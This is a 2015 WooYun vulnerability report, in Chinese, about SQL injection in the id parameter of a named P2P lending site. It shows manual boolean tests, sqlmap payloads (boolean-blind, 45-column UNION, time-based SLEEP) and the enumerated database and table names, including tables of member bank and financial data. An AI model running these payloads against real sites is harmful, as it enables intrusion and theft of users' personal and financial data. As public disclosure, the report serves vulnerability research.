当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113998

漏洞标题:财源网主站SQL注入(全站用户信息泄露涉及上亿资金)

相关厂商:财源网

漏洞作者: 90Snake

提交时间:2015-05-14 12:10

修复时间:2015-06-28 12:12

公开时间:2015-06-28 12:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

金融,P2C

详细说明:

本来的URL做了伪静态是 http://www.cybp2c.com/borrow/detail/id/11
不难看出其原本是这样的http://www.cybp2c.com/borrow/detail?id=11
然后测试 and 1=1 正常
and 1=2 报错了
然后直接上Sqlmap

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 7708=7708
    Type: UNION query
    Title: MySQL UNION query (NULL) - 45 columns
    Payload: id=-2913 UNION ALL SELECT 54,54,54,54,54,54,54,54,54,54,54,54,54,54,CONCAT(0x7163727971,0x414b746d6f
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=11 AND SLEEP(5)
---
[22:49:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[22:49:44] [INFO] fetching database names
[22:49:44] [INFO] the SQL query used returns 3 entries
[22:49:44] [INFO] resumed: "information_schema","information_schema","informa...
[22:49:44] [INFO] resumed: "test","test","test"
[22:49:44] [INFO] resumed: "wangdai2","wangdai2","wangdai2"
available databases [3]:
[*] information_schema
[*] test
[*] wangdai2


数据在wangdai2这里

漏洞证明:

Database: wangdai2
[69 tables]
+----------------------------+
| lzh_acl                    |
| lzh_action_log             |
| lzh_ad                     |
| lzh_admin_upload           |
| lzh_api_auth               |
| lzh_area                   |
| lzh_article                |
| lzh_article_area           |
| lzh_article_category       |
| lzh_article_category_area  |
| lzh_ausers                 |
| lzh_ausers_log             |
| lzh_borrow                 |
| lzh_borrow_invest          |
| lzh_comment                |
| lzh_deduct_log             |
| lzh_depart                 |
| lzh_donate                 |
| lzh_fail_log               |
| lzh_feedback               |
| lzh_friend                 |
| lzh_global                 |
| lzh_inner_msg              |
| lzh_invest_instalment      |
| lzh_jubao                  |
| lzh_kvtable                |
| lzh_loan_company           |
| lzh_member_address         |
| lzh_member_apply           |
| lzh_member_banks           |
| lzh_member_contact_info    |
| lzh_member_data_info       |
| lzh_member_date            |
| lzh_member_department_info |
| lzh_member_ensure_info     |
| lzh_member_financial_info  |
| lzh_member_friend          |
| lzh_member_house_info      |
| lzh_member_info            |
| lzh_member_levellog        |
| lzh_member_limitlog        |
| lzh_member_login           |
| lzh_member_money           |
| lzh_member_moneylog        |
| lzh_member_msg             |
| lzh_member_payonline       |
| lzh_member_recommendlog    |
| lzh_member_safequestion    |
| lzh_member_status_log      |
| lzh_member_withdraw        |
| lzh_members                |
| lzh_members_status         |
| lzh_metal_deal             |
| lzh_metal_depart           |
| lzh_metal_members          |
| lzh_metal_money            |
| lzh_metal_outinto          |
| lzh_name_apply             |
| lzh_oauth                  |
| lzh_sys_tip                |
| lzh_today_reward           |
| lzh_verify                 |
| lzh_video_apply            |
| lzh_vip_apply              |
| lzh_visit_record_log       |
| lzh_workers_depart         |
| members                    |
| rry_members                |
| tbl_user_cyb               |
+----------------------------+


目测数据肯定在comment
不信你试试?

修复方案:

过滤
求给20rank
PS:告诉你个秘密,好多无量厂商都不知道:评价Rank是不花你钱的哦~

版权声明:转载请注明来源 90Snake@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论